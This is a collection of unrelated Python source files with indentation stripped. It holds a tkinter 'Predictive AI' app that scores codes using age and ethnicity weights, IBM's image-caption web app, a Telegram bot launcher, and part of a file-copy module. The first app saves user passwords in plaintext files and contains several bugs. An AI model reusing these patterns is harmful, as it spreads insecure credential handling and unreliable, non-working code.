for idx,val in enumerate(tat_val_match):
code_idx = "Code "+str(idx+1)
tat_val_match[idx] = tat_val_match[idx]*dicte[code_idx]
to_check_array_n_match = np.where(to_check_array == 0, -0.001, 0)
tat_val_n_match = np.dot(to_check_array_n_match.T,standard_matrix)
for idx,val in enumerate(tat_val_n_match):
code_idx = "Code "+str(idx+1)
tat_val_n_match[idx] = tat_val_n_match[idx]*dicte[code_idx]
tat_val = tat_val_match + tat_val_n_match
top_2_idx = np.argsort(tat_val)[-5:]
top_2_val = [tat_val[i] for i in reversed(top_2_idx)]
accuarcy = [val/sum(top_2_val) for val in top_2_val]
predictions = ["Code " + str(idx+1) for idx in reversed(top_2_idx)]
return predictions,accuarcy,get_scores(top_2_val) """
def mydot(v1, v2):
return sum([x*y for x,y in zip(v1, v2)])
def matmulvec(M, v):
return [mydot(r,v) for r in M]
def matprod(x, y):
I = range(len(x))
J = range(len(y[0]))
K = range(len(x[0]))
matmul = []
for i in I:
matmulprod = []
for j in J:
for k in K:
matmulprod.append(sum(x[i][k]*y[k][j]))
matmul.append(matmulprod)
return matmul
def py_matmul(a, b):
ca = len(a)
ra = 1
rb, cb = b.shape
assert ca == rb, f"{ca} != {rb}"
output = np.zeros(shape=(ra, cb))
for i in range(ra):
for j in range(cb):
for k in range(rb):
output[i, j] += a[i, k] * b[k, j]
return output
consumption_dict = {}
consumption_dict['Finetuning Logic'] = "Not Consumed"
consumption_dict['Qualifying criteria'] = "Not Used"
consumption_dict['Age logic'] = "Not Consumed"
consumption_dict['Insurance settlement history'] = "Not Consumed"
consumption_dict['Ethnicity Logic'] = "Not Consumed"
consumption_dict['Layer Logic'] = "Not Consumed"
f = open('Value-json/hyperparam.json')
hyperparam = json.load(f)
st = standard_matrix.T
mat_dict = []
to_check_array = np.where(to_check_array == 0, hyperparam['alpha'], 1)
rnums = []
for inx,num in enumerate(to_check_array):
rnum = "(R{},{})".format(inx+5,num)
rnums.append(rnum)
to_check_dict[col_number] = rnums
with open("Input Sheets/mat_dict.txt",'r') as file:
line = file.read()
inner_list = [elt.strip() for elt in line.split(',')]
#print(inner_list)
f = open('Value-json/logic_activation.json')
activation = json.load(f)
if activation['matmul_logic'] == "active":
for number in inner_list:
if col_number == int(number):
for ind in range(len(st)):
code_idx = "C"+str(ind+1)
ajio = np.multiply(to_check_array,st[ind])
tax_p = []
for aj in range(len(ajio)):
tax_p.append('{}(R{},{})'.format(ajio[aj],aj+5,code_idx))
mat_dict.append(tax_p)
mat_master_dict[col_number] = np.array(mat_dict).T
standard_matrix = standard_matrix
for inx in range(len(to_check_array)):
if to_check_array[inx] < 0:
#print(len(standard_matrix[inx]))
for idx,val in enumerate(standard_matrix[inx]):
if val < 0:
standard_matrix[inx][idx] = 0
#print(standard_matrix)
tat_val = np.dot(to_check_array.T,standard_matrix)
#dicte,prediction_codes = get_age_decision(age,lent)
qualify_dict = get_qualify(to_check_array,qualifying_dict,lent)
col_number =col_number
intial_logic = {}
for idx,val in enumerate(tat_val):
code_idx = "Code "+str(idx+1)
f = open('Value-json/logic_activation.json')
activation = json.load(f)
if qualify_dict[code_idx] <0:
if activation['qualifying_criteria'] == 'active':
consumption_dict['Qualifying criteria'] = "Used"
tat_val[idx] = -1000000
else:
pass
else:
if activation['age_logic'] == 'active':
if dicte[code_idx] == 0:
consumption_dict['Age logic'] = "Consumed"
tat_val[idx] = -1000000
else:
pass
else:
pass
intial_logic[code_idx] = tat_val[idx]
f = open('Value-json/logic_activation.json')
activation = json.load(f)
if activation['settlement_logic'] == 'active':
df = pd.read_excel(os.curdir + '/Logic Container/Insurance settlement history.xlsx')
for idx,rows in df.iterrows():
if rows['Age']!=rows['Age']:
break
else:
age_r = rows['Age'].split('-')
age_start = int(age_r[0])
age_end = int(age_r[1])
if age_start <= age <= age_end:
total = 0
val_arr = (rows[1:].values)
for val in val_arr:
if '#' in str(val):
pass
else:
total = total + val
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
if inx!=3122239:
if '#' in str(rows[code_idx]):
pass
else:
prob = float(rows[code_idx])/float(total)
consumption_dict['Insurance settlement history'] = "Consumed"
tat_val[inx] = tat_val[inx] * prob
else:
continue
settlement_logic = {}
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
settlement_logic[code_idx] = tat_val[inx]
f = open('Value-json/logic_activation.json')
activation = json.load(f)
if activation['ethnicity_logic'] == 'active':
df = pd.read_excel(os.curdir + '/Logic Container/Ethnicity Logic.xlsx')
#total = df.iloc[9,:]
cols = df.columns
for inx,rows in df.iterrows():
if rows['Ethnicity']!=rows['Ethnicity']:
break
else:
if ethnicity == rows['Ethnicity']:
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
if inx!=311229:
prob = rows[code_idx]
consumption_dict['Ethnicity Logic'] = "Consumed"
tat_val[inx] = tat_val[inx] * prob
else:
pass
else:
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
if inx!=311129:
prob = 1
consumption_dict['Ethnicity Logic'] = "Consumed"
tat_val[inx] = tat_val[inx] * prob
else:
pass
ethnicity_logic = {}
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
ethnicity_logic[code_idx] = tat_val[inx]
f = open('Value-json/logic_activation.json')
activation = json.load(f)
if activation['finetuning_logic'] == 'active':
df = pd.read_excel(os.curdir + '/Logic Container/Fine tuning logic.xlsx')
#total = df.iloc[9,:]
cols = df.columns
for inx,rows in df.iterrows():
if rows['Age']!=rows['Age']:
break
else:
age_r = rows['Age'].split('-')
age_start = int(age_r[0])
age_end = int(age_r[1])
if age_start <= age <= age_end:
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
if inx!=31119:
if '#' not in str(rows[code_idx]):
prob = rows[code_idx]
consumption_dict['Finetuning Logic'] = "Consumed"
tat_val[inx] = tat_val[inx] * prob
else:
tat_val[inx] = -100000
else:
continue
finetuning_logic = {}
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
finetuning_logic[code_idx] = tat_val[inx]
f = open('Value-json/logic_activation.json')
activation = json.load(f)
if activation['layer_logic'] == 'active':
df = pd.read_excel(os.curdir + '/Logic Container/Layer Logic.xlsx')
layer = 0
for idx,rows in df.iterrows():
layer = layer + 1
if layer == 1:
initial_prediction_weight = rows['Weightage']
elif layer ==2:
settlement_logic_weight = rows['Weightage']
elif layer == 3:
ethnicity_logic_weight = rows['Weightage']
elif layer == 4:
finetuning_logic_weight = rows['Weightage']
else:
pass
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
tat_val[inx] = intial_logic[code_idx]*(initial_prediction_weight + settlement_logic_weight*(settlement_logic[code_idx]/intial_logic[code_idx]) + ethnicity_logic_weight*(ethnicity_logic[code_idx]/settlement_logic[code_idx]) + finetuning_logic_weight*(finetuning_logic[code_idx]/ethnicity_logic[code_idx]))
consumption_dict['Layer Logic'] = "Consumed"
final_logic = {}
for inx,score in enumerate(tat_val):
code_idx = "Code "+str(inx+1)
final_logic[code_idx] = tat_val[inx]
def get_logic_pred(dicte):
new_dicte = {k: v for k, v in sorted(dicte.items(), key=lambda item: item[1], reverse=True)}
cnt = 0
logic_pred = []
for idx,value in new_dicte.items():
cnt = +1
logic_pred.append(idx)
return logic_pred
intial_logic_pred = get_logic_pred(intial_logic)
ethnicity_logic_pred = get_logic_pred(ethnicity_logic)
settlement_logic_pred = get_logic_pred(settlement_logic)
finetuning_logic_pred = get_logic_pred(finetuning_logic)
final_logic_pred = get_logic_pred(final_logic)
consumption_metric = [col_number,json.dumps(consumption_dict)]
prediction_metric = [col_number,json.dumps(intial_logic),intial_logic_pred,json.dumps(settlement_logic),settlement_logic_pred,json.dumps(ethnicity_logic),ethnicity_logic_pred,json.dumps(finetuning_logic),finetuning_logic_pred,json.dumps(final_logic),final_logic_pred]
predictions = list(final_logic_pred)[:5]
top_2_val = [int(final_logic[i]) for i in (predictions)]
top_2_idx = []
for val in predictions:
wer = val.split()
top_2_idx.append(int(wer[1]))
#print(tat_val)
#accuarcy = [val/sum(top_2_val) for val in top_2_val]
#predictions = ["Code " + str(idx+1) for idx in reversed(top_2_idx)]
score_relat,score_std = get_percentile(top_2_val,sum_std_mat,top_2_idx,to_check_array)
return predictions,score_relat,score_std,prediction_metric,consumption_metric,mat_master_dict,to_check_dict
def save_master_log(master_sheet_filepath):
df = pd.read_excel(master_sheet_filepath)
df_w = df.fillna(0)
df_w = df_w.iloc[3:,:]
weightage = list(df_w.iloc[:,4].values)
df = pd.read_excel(master_sheet_filepath)
df_s = df.fillna(0)
df_s = df_s.iloc[3:,:]
scores = df_s.iloc[:,5].values
scores = np.where(scores == 'B',-1,scores)
scores = np.where(scores == 'A',1,scores)
#scores = np.prod(scores)
#weightage.append(scores)
np.savetxt('AI Internal-Outputs/master_log_weightage.txt', weightage)
np.savetxt('AI Internal-Outputs/master_log_score.txt',scores)
def get_recommendation(df_attempt):
b = np.loadtxt('AI Internal-Outputs/master_log_weightage.txt')
c = np.loadtxt('AI Internal-Outputs/master_log_score.txt')
scores = (np.multiply(c,df_attempt)).flatten()
sc_a = 0
sc_b = 0
for sc in scores:
if sc==-1:
sc_b+=1
elif sc == 1:
sc_a+=1
else :
pass
if sc_b == 0:
if sc_a ==0:
score = "No Score Defined"
else:
score = 'A'
else:
score = 'B'
self.weightage = b
mul = (np.multiply(self.weightage,df_attempt)).flatten()
#mul = [(i+5)/2 for i in mul if i != 0]
cum_score = np.sum(mul)
#print(cum_score)
#print(cum_score)
if cum_score < 0 :
cum_score = 0
elif cum_score > 5:
cum_score = 5
elif 0<=cum_score<=1:
cum_score = 0
elif 1<cum_score<=2:
cum_score = 1
elif 2<cum_score<=3:
cum_score = 2
elif 3<cum_score<=4:
cum_score = 3
elif 4<cum_score<5:
cum_score = 4
else:
cum_score = 5
filepath = curdir + "/Input Sheets/recommendation_sheet.csv"
df = pd.read_csv(filepath)
#df_k = df.fillna(" ")
x = df.iloc[1:,1:].values
x = x.flatten()
self.recom_tot_val = []
for value in x:
if value!=value:
pass
else:
#print(value)
self.recom_tot_val.append(value)
score_a = df.iloc[6,:]
score_b = df.iloc[7,:]
for idx,row in df.iterrows():
if idx == int(cum_score):
recom = [row['Intepretation-1']]
if score=="No Score Defined":
recom.append(row['Intepretation-2'])
recom.append(row['Intepretation-3'])
else :
if score=='A':
recom.append(score_a['Intepretation-2'])
recom.append(score_a['Intepretation-3'])
else:
recom.append(score_b['Intepretation-2'])
recom.append(score_b['Intepretation-3'])
return recom,cum_score,score,mul
def execute(df,col_number,mat_master_dict,to_check_dict):
sf = read_master_sheet(self.master_sheet_filepath)
save_master_log(self.master_sheet_filepath)
standard_matrix,qualifying_dict,sum_std_mat,lent = get_standard_matrix(sf)
to_check_array,age,ethnicity = get_test_output(df,col_number)
predictions,score_relat,score_std,prediction_metric,consumption_metric,mat_master_dict,to_check_dict = get_top_5_predictions(to_check_array,age,standard_matrix,qualifying_dict,sum_std_mat,ethnicity,col_number,lent,mat_master_dict,to_check_dict)
#print("Age of the user is = ",age)
#print("TOP 5 PREDICTIONS ARE :")
#print(predictions)
#print("With Cumilitave scores of :")
#print(scores)
return age,predictions,score_relat,score_std,ethnicity,prediction_metric,consumption_metric,mat_master_dict,lent,to_check_dict
def execute_single_files():
print("____________*** Prediction Al ***_____________________")
print("Please make sure master sheet and test sheet are uploaded")
print(" ")
for test_sheet_filepath in self.test_sheet_filepaths:
self.test_sheet_filepath = test_sheet_filepath
file1 = open("AI External-Outputs/path_info.txt", "w")
file1.write("M"+self.master_sheet_filepath)
file1.write(" \n")
file1.write("T"+self.test_sheet_filepath)
file1.write(" \n")
file1.close()
test_df = read_data(self.test_sheet_filepath)
col_name = test_df.iloc[:4:].columns
col_name = col_name
test_df = read_data(self.test_sheet_filepath)
test_df = df_column_uniquify(test_df)
temp_df = test_df.iloc[:,4:]
col_name = temp_df.columns
code_values = temp_df.iloc[0].values
prediction_output = []
accuracy_1 = 0
accuracy_2 = 0
self.cnt = 0
# Progress bar widget
prediction_metrics = []
consumption_metrics = []
mat_master_dict = {}
to_check_dict = {}
file = open("AI External-Outputs/path_info.txt","r")
for lines in file.read().splitlines():
if lines[0] == "T":
test_filepath = lines[1:]
file.close()
t_filename = Path(test_filepath).stem
cols_names = ['Column Reference Code','Actual Code','Age','Ethnicity','Predcition Codes','Relative Confidence Percentage','Standard Confidence Percentage','Story','Recommendations','5 yr Risk','10 yr Risk','Lifetime Risk']
df = pd.DataFrame(columns =cols_names)
df.to_csv("AI External-Outputs/Prediction_output_{}.csv".format(t_filename),index=False)
for idx,col in enumerate(col_name):
age,prediction,score_relat,score_std,ethnicity,prediction_metric,consumption_metric,mat_master_dict,lent,to_check_dict = execute(test_df,col,mat_master_dict,to_check_dict)
consumption_metrics.append(consumption_metric)
prediction_metrics.append(prediction_metric)
prediction_output = [col,code_values[idx], age,ethnicity, prediction,score_relat,score_std,'story','Recommendations','5 yr risk','10 yr risk','lifetime risk']
if code_values[idx]!=code_values[idx]:
code_values[idx] = "Not Provided"
if col!=col:
col = "Not Provided"
if age!=age:
age = "Not Provided"
if ethnicity!=ethnicity:
ethnicity = "Not Provided"
print("-----------------------------------------CASE NUMBER = {}------------------------------------------------------".format(col))
print()
print('For Case Number {} with Age {}yrs and Ethnicity {}, has an Actual Provided Code as {} However AI Top 5 Predcition Codes are {} with Relative Confidence Percentage as {}'.format(col,age,ethnicity,code_values[idx],prediction,score_relat))
print()
print("******************************************************************************************************************************************************************************************************************************************")
self.cnt = self.cnt+1
if code_values[idx] in [prediction[0],prediction[1]]:
accuracy_2 = accuracy_2+1
if code_values[idx] == prediction[0]:
accuracy_1 = accuracy_1+1
df = pd.DataFrame(consumption_metrics, columns =['Column Reference Code','Logic Consumption Dictonary'])
file = open("AI External-Outputs/path_info.txt","r")
for lines in file.read().splitlines():
if lines[0] == "T":
test_filepath = lines[1:]
file.close()
t_filename = Path(test_filepath).stem
with open("Input Sheets/mat_dict.txt",'r') as file:
line = file.read()
inner_list = [elt.strip() for elt in line.split(',')]
inner_list = inner_list[:-1]
with open("AI External-Outputs/matmul_{}.csv".format(t_filename),'w') as f:
w = csv.writer(f)
code_dict = []
for i in range(1,lent):
code_dict.append("Code "+str(i))
w.writerow(code_dict)
for key,val in mat_master_dict.items():
w.writerow([key])
w.writerows(val)
with open("AI External-Outputs/attempt_sheet_{}.csv".format(t_filename),'w') as f:
w = csv.writer(f)
for key,val in to_check_dict.items():
w.writerow([key])
w.writerows([val])
df.to_csv("AI External-Outputs/Consumption_metric_{}.csv".format(t_filename))
df = pd.DataFrame(prediction_metrics, columns =['Column Reference Code','Intial Score','Intial Prediction','Settlement Logic','Settlement Prediction','Ethnicity Logic','Ethnicity Prediction','Fine Tuning Logic','FineTuning Prediction','Final Logic','Final Prediction'])
df.to_csv("AI External-Outputs/Prediction_metric_{}.csv".format(t_filename))
file = open("AI External-Outputs/path_info.txt","r")
for lines in file.read().splitlines():
if lines[0] == "T":
test_filepath = lines[1:]
file.close()
total_df= pd.read_excel(test_filepath)
chl = 0
chlt = 0
for inxt,rows in total_df.iterrows():
if rows['Sub-Feature'] == "external factor":
chl = inxt
for inxt,rows in total_df.iterrows():
if rows['Sub-Feature'] == "endFeatures":
chlt = inxt
df_ops = total_df[[col]]
df_ops = df_ops.fillna(0)
df_process = total_df.fillna(method='ffill')
df_attempt = df_ops.where(df_ops == 0, 1)
df_attempt = (df_attempt.iloc[chl:chlt-1,:]).values
df_attempt = df_attempt.flatten()
recommendation,cum_score,score,mul = get_recommendation(df_attempt)
df = pd.read_csv("AI External-Outputs/Prediction_output_{}.csv".format(t_filename))
dicte= {}
for inx,items in enumerate(prediction_output):
dicte[cols_names[inx]] = items
dicte['Recommendations'] = recommendation
df = df.append(dicte,ignore_index=True)
df.to_csv("AI External-Outputs/Prediction_output_{}.csv".format(t_filename),index=False)
#print("Accurate is ",accuracy)
if self.cnt==0:
self.cnt= 1
self.accuracy_2 = (accuracy_2/self.cnt)*100
self.accuracy_1 = (accuracy_1/self.cnt)*100
gr = GeneticRisk()
sk = storykey()
a = threading.Thread(target = gr.execute(self.test_sheet_filepath,col))
a.start()
a.join()
sk.execute(self.test_sheet_filepath,col,idx)
execute_single_files()
def exit_the_window():
self.user_root.destroy()
def display(self):
def add_user_verify():
if not os.path.exists('user_pass_database'):
os.makedirs('user_pass_database')
username_info = username_data_entry.get()
password_info = password_data_entry.get()
start_code_info = start_code_entry.get()
end_code_info = end_code_entry.get()
file = open("user_pass_database/" + username_info + ".txt", "w")
file.write(username_info + "\n")
file.write(password_info + "\n")
file.write(start_code_info + "\n")
file.write(end_code_info + "\n")
file.close()
username_data_entry.delete(0, END)
password_data_entry.delete(0, END)
start_code_entry.delete(0, END)
end_code_entry.delete(0, END)
Label(self.user_root, text="Added Successfully", fg="green", font=("calibri", 11)).pack()
Button(self.user_root, text="Exit", width=10, height=1, command = self.user_root.destroy()).pack()
def add_user_data():
global username_data
global password_data
global start_code
global end_code
global username_data_entry
global password_data_entry
global start_code_entry
global end_code_entry
username_data = StringVar()
password_data = StringVar()
start_code = StringVar()
end_code = StringVar()
self.user_root = tkinter.Tk()
self.user_root.geometry("500x500")
Label(self.user_root, text="Username * ").pack()
username_data_entry = Entry(self.user_root, textvariable=username_data)
username_data_entry.pack()
Label(self.user_root, text="").pack()
Label(self.user_root, text="Password * ").pack()
password_data_entry = Entry(self.user_root, textvariable=password_data)
password_data_entry.pack()
Label(self.user_root, text="").pack()
Label(self.user_root, text="Start Unique Code").pack()
start_code_entry = Entry(self.user_root, textvariable=start_code)
start_code_entry.pack()
Label(self.user_root, text="").pack()
Label(self.user_root, text="End Unique Code").pack()
end_code_entry = Entry(self.user_root, textvariable=end_code)
end_code_entry.pack()
Label(self.user_root, text="").pack()
Button(self.user_root, text="Add user data", width=10, height=1, command = add_user_verify).pack()
def display_prediction():
root = tkinter.Tk()
root.geometry("1024x1024")
ico_path = curdir+"\media\my_icon.ico"
root.iconbitmap(ico_path)
grid = MagicGrid(root)
grid.pack(side="top", expand=2, fill="both")
# open file
file = open("AI External-Outputs/path_info.txt","r")
for lines in file.read().splitlines():
if lines[0] == "T":
test_filepath = lines[1:]
file.close()
t_filename = Path(test_filepath).stem
with open(self.current_dir+"/AI External-Outputs/Prediction_output_{}.csv".format(t_filename), newline = "") as file:
reader = csv.reader(file)
parsed_rows = 0
# r and c tell us where to grid the labels
for row in reader:
if parsed_rows == 0:
# Display the first row as a header
grid.add_header(*row)
else:
grid.add_row(*row)
parsed_rows += 1
root.mainloop()
root = Tk()
ico_path = curdir+"\media\my_icon.ico"
root.iconbitmap(ico_path)
# specify size of window.
root.geometry("1024x1024")
# Create text widget and specify size.
T = Text(root, height = 5, width = 52)
# Create label
l = Label(root, text = "Prediction by AI are saved")
l.config(font =("Courier", 14))
# Create button for next text.
b1 = Button(root, text = "Display the Predictions", command = display_prediction)
# Create an Exit button.
b2 = Button(root, text = "Exit",
command = root.destroy)
b3 = Button(root, text = "Add User Data", command = add_user_data)
T.insert(END, "Total Number of user Tested = ")
T.insert(END, str(self.cnt)+'\n')
T.insert(END, "Accuracy for being in top 2 predictions = ")
T.insert(END, str(self.accuracy_2)+'\n')
T.insert(END, "Accuracy for being the top predictions = ")
T.insert(END, str(self.accuracy_1)+'\n')
l.pack()
T.pack()
b1.pack()
b2.pack()
b3.pack()
# Insert The Fact.
def start_submit_thread(self,event):
global submit_thread
submit_thread = threading.Thread(target=self.get_prediction)
submit_thread.daemon = True
self.progressbar.start()
submit_thread.start()
self.root.after(100, self.check_submit_thread)
def check_submit_thread(self):
if submit_thread.is_alive():
self.progressbar["value"] = int(self.progressbar["value"] + 10)
Label(self.root,text=(str(self.progressbar["value"])+"/"+"100")).grid(row=1, column=0, columnspan=2, ipadx=50)
self.progressbar.update()
self.root.after(100, self.check_submit_thread)
else:
#print("yes")
self.progressbar.stop()
self.display()
# Designing popup for login invalid password
def password_not_recognised():
global password_not_recog_screen
password_not_recog_screen = Toplevel(login_screen)
ico_path = curdir+"\media\my_icon.ico"
password_not_recog_screen.iconbitmap(ico_path)
password_not_recog_screen.title("Success")
password_not_recog_screen.geometry("150x100")
Label(password_not_recog_screen, text="Invalid Password ").pack()
Button(password_not_recog_screen, text="OK", command=delete_password_not_recognised).pack()
# Designing popup for user not found
def user_not_found():
global user_not_found_screen
user_not_found_screen = Toplevel(login_screen)
ico_path = curdir+"\media\my_icon.ico"
login_screen.iconbitmap(ico_path)
user_not_found_screen.title("Success")
user_not_found_screen.geometry("150x100")
Label(user_not_found_screen, text="User Not Found").pack()
Button(user_not_found_screen, text="OK", command=delete_user_not_found_screen).pack()
user_not_found.after(500, delete_user_not_found_screen)
# Deleting popups
def delete_login_success():
login_success_screen.destroy()
login_screen.destroy()
main_screen.destroy()
def delete_password_not_recognised():
password_not_recog_screen.destroy()
def delete_user_not_found_screen():
user_not_found_screen.destroy()
# Designing Main(first) window
def main_account_screen():
if not os.path.exists('user_credential_database'):
os.makedirs('user_credential_database')
global main_screen
main_screen = Tk()
ico_path = curdir+"\media\my_icon.ico"
main_screen.iconbitmap(ico_path)
main_screen.geometry("300x250")
main_screen.title("Account Login")
Label(text="PREDECTIVE AI", bg="blue", width="300", height="2", font=("Calibri", 13)).pack()
Label(text="").pack()
Button(text="Login", height="2", width="30", command = login).pack()
Label(text="").pack()
Button(text="Register", height="2", width="30", command=register).pack()
main_screen.mainloop()
main_account_screen()
|
app.py
|
#!/usr/bin/env python
#
# Copyright 2018 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import collections
import json
import logging
import os
import requests
import signal
import time
import threading
from tornado import httpserver, ioloop, web
from tornado.options import define, options, parse_command_line
try:
import Queue as queue
except ImportError:
import queue
# Command Line Options
define("port", default=8088, help="Port the web app will run on")
define("ml-endpoint", default="http://localhost:5000",
help="The Image Caption Generator REST endpoint")
# Setup Logging
logging.basicConfig(level=os.environ.get("LOGLEVEL", "INFO"),
format='%(levelname)s: %(message)s')
# Global variables
static_img_path = "static/img/images/"
temp_img_prefix = "MAX-"
image_captions = collections.OrderedDict()
VALID_EXT = ['png', 'jpg', 'jpeg', 'gif']
class MainHandler(web.RequestHandler):
def get(self):
self.render("index.html", image_captions=image_captions)
class DetailHandler(web.RequestHandler):
def get(self):
image = self.get_argument('image', None)
if not image:
self.set_status(400)
return self.finish("400: Missing image parameter")
if image not in image_captions:
self.set_status(404)
return self.finish("404: Image not found")
self.render("detail-snippet.html", image=image,
predictions=image_captions[image])
class CleanupHandler(web.RequestHandler):
def get(self):
self.render("cleanup.html")
def delete(self):
clean_up()
class UploadHandler(web.RequestHandler):
def post(self):
finish_ret = []
threads = []
ret_queue = queue.Queue()
new_files = self.request.files['file']
for file_des in new_files:
file_name = temp_img_prefix + file_des['filename']
if valid_file_ext(file_name):
rel_path = static_img_path + file_name
output_file = open(rel_path, 'wb')
output_file.write(file_des['body'])
output_file.close()
t = threading.Thread(target=run_ml_queued,
args=(rel_path, ret_queue))
threads.append(t)
t.start()
for t in threads:
t.join()
sorted_ret = sorted(list(ret_queue.queue), key=lambda t: t[0].lower())
for rel_path, caption in sorted_ret:
finish_ret.append({
"file_name": rel_path,
"caption": caption[0]['caption']
})
if not finish_ret:
self.send_error(400)
return
sort_image_captions()
self.finish(json.dumps(finish_ret))
def run_ml_queued(img_path, ret_queue):
caption = run_ml(img_path)
ret_queue.put((img_path, caption))
def valid_file_ext(filename):
return '.' in filename and filename.split('.', 1)[1].lower() in VALID_EXT
# Runs ML on given image
def run_ml(img_path):
img_file = {'image': open(img_path, 'rb')}
r = requests.post(url=ml_endpoint, files=img_file)
cap_json = r.json()
caption = cap_json['predictions']
image_captions[img_path] = caption
return caption
def sort_image_captions():
global image_captions
image_captions = collections.OrderedDict(
sorted(image_captions.items(), key=lambda t: t[0].lower()))
# Gets list of images with relative paths from static dir
def get_image_list():
image_list = sorted(os.listdir(static_img_path))
rel_img_list = [static_img_path + s for s in image_list]
return rel_img_list
# Run all static images through ML
def prepare_metadata():
threads = []
rel_img_list = get_image_list()
for img in rel_img_list:
t = threading.Thread(target=run_ml, args=(img,))
threads.append(t)
t.start()
for t in threads:
t.join()
sort_image_captions()
# Deletes all files uploaded through the GUI and removes them from the dict
def clean_up():
img_list = get_image_list()
for img_file in img_list:
if img_file.startswith(static_img_path + temp_img_prefix):
os.remove(img_file)
image_captions.pop(img_file)
def signal_handler(sig, frame):
ioloop.IOLoop.current().add_callback_from_signal(shutdown)
def shutdown():
logging.info("Cleaning up image files")
clean_up()
logging.info("Stopping web server")
server.stop()
ioloop.IOLoop.current().stop()
def make_app():
handlers = [
(r"/", MainHandler),
(r"/upload", UploadHandler),
(r"/cleanup", CleanupHandler),
(r"/detail", DetailHandler)
]
configs = {
'static_path': 'static',
'template_path': 'templates'
}
return web.Application(handlers, **configs)
def main():
parse_command_line()
global ml_endpoint
ml_endpoint = options.ml_endpoint
if '/model/predict' not in options.ml_endpoint:
ml_endpoint = options.ml_endpoint.rstrip('/') + "/model/predict"
logging.info("Connecting to ML endpoint at %s", ml_endpoint)
try:
requests.get(ml_endpoint)
except requests.exceptions.ConnectionError:
logging.error(
"Cannot connect to the Image Caption Generator REST endpoint at " +
options.ml_endpoint)
raise SystemExit
logging.info("Starting web server")
app = make_app()
global server
server = httpserver.HTTPServer(app)
server.listen(options.port)
signal.signal(signal.SIGINT, signal_handler)
logging.info("Preparing ML metadata (this may take some time)")
start = time.time()
prepare_metadata()
end = time.time()
logging.info("Metadata prepared in %s seconds", end - start)
logging.info("Use Ctrl+C to stop web server")
ioloop.IOLoop.current().start()
if __name__ == "__main__":
main()
|
main.py
|
from marks_monitoring import tg_bot
import threading
def main():
threading.Thread(target=lambda: tg_bot.bot.polling(none_stop=True)).start()
print("Telegram bot started successfully")
if __name__ == "__main__":
main()
|
saisoku.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""saisoku.py
Saisoku is a Python module that helps you build complex pipelines of batch file copying jobs.
See README.md or https://github.com/shirosaidev/saisoku
for more information.
Author: shirosai <cpark16@gmail.com>
Copyright (C) Chris Park 2019
saisoku is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
import errno
import os
import time
import mmap
try:
from queue import Queue
except ImportError:
from Queue import Queue
from threading import Thread, Lock
import shutil
from shutil import Error
import pyfastcopy
from scandir import scandir
from tqdm import tqdm
import logging
import tempfile
SAISOKU_VERSION = '0.1-b.4'
__version__ = SAISOKU_VERSION
# settings
logtofile = True
loglevel = logging.DEBUG
fileQueue = Queue()
def logging_setup():
"""Set up logging."""
logger = logging.getLogger(name='saisoku')
logger.setLevel(loglevel)
logformatter = logging.Formatter('%(asctime)s [%(levelname)s][%(name)s] %(message)s')
ch = logging.StreamHandler()
ch.setLevel(loglevel)
ch.setFormatter(logformatter)
logger.addHandler(ch)
logger.propagate = False
if logtofile:
logfile = os.path.join(tempfile.gettempdir(), 'saisoku.log')
hdlr = logging.FileHandler(logfile)
hdlr.setLevel(loglevel)
hdlr.setFormatter(logformatter)
logger.addHandler(hdlr)
return logger
logger = logging_setup()
class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def output_banner():
import random
c = random.choice((color.PURPLE, color.CYAN, color.YELLOW, color.RED))
banner = '''%s
___ _ _
/ __| __ _ (_) ___ ___ | |__ _ _
\\__ \\ / _` | | | (_-< / _ \\ | / / | +| |
|___/ \\__,_| _|_|_ /__/_ \___/ |_\\_\\ \\_,_|
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' v%s
%s''' % (c, SAISOKU_VERSION, color.END)
print(banner)
def get_num_lines(fileNameList):
"""Get number of lines in txt file."""
fp = open(fileNameList, "r+")
buf = mmap.mmap(fp.fileno(), 0)
lines = 0
while buf.readline():
lines += 1
return lines
class ThreadedCopy:
"""Threaded file copy class."""
totalFiles = 0
copyCount = 0
lock = Lock()
def __init__(self, src, dst, threads=16, filelist=None, symlinks=False, ignore=None, copymeta=True, package=False):
self.src = src
self.dst = dst
self.threads = threads
self.filelist = filelist
self.symlinks = symlinks
# copytree ignore patterns like '*.pyc', 'tmp*'
self.ignore = None if ignore is None else shutil.ignore_patterns(ignore)
self.copymeta = copymeta
self.is_package_task = package
self.fileList = []
self.sizecounter = 0
self.errors = []
logger.info('Starting file copy from %s to %s..' % (self.src, self.dst))
# open filelist txt file or scandir src path and preprocess the total files sizes
logger.info("Calculating total file size..")
if filelist:
with open(self.filelist, "r") as file: # txt with a file per line
for line in tqdm(file, total=get_num_lines(self.filelist), unit='files'):
fname = line.rstrip('\n')
if not self.is_package_task: # copy files package task
fpath = os.path.join(self.src, fname)
else:
fpath = fname
size = os.stat(fpath).st_size
self.fileList.append((fname, fpath, size))
self.sizecounter += size
else:
for item in tqdm(scandir(self.src), unit='files'): # scandir and build file list
self.fileList.append(item)
self.sizecounter += item.stat().st_size
# make dst directory if it doesn't exist and copy stat
try:
os.makedirs(dst)
except OSError as e:
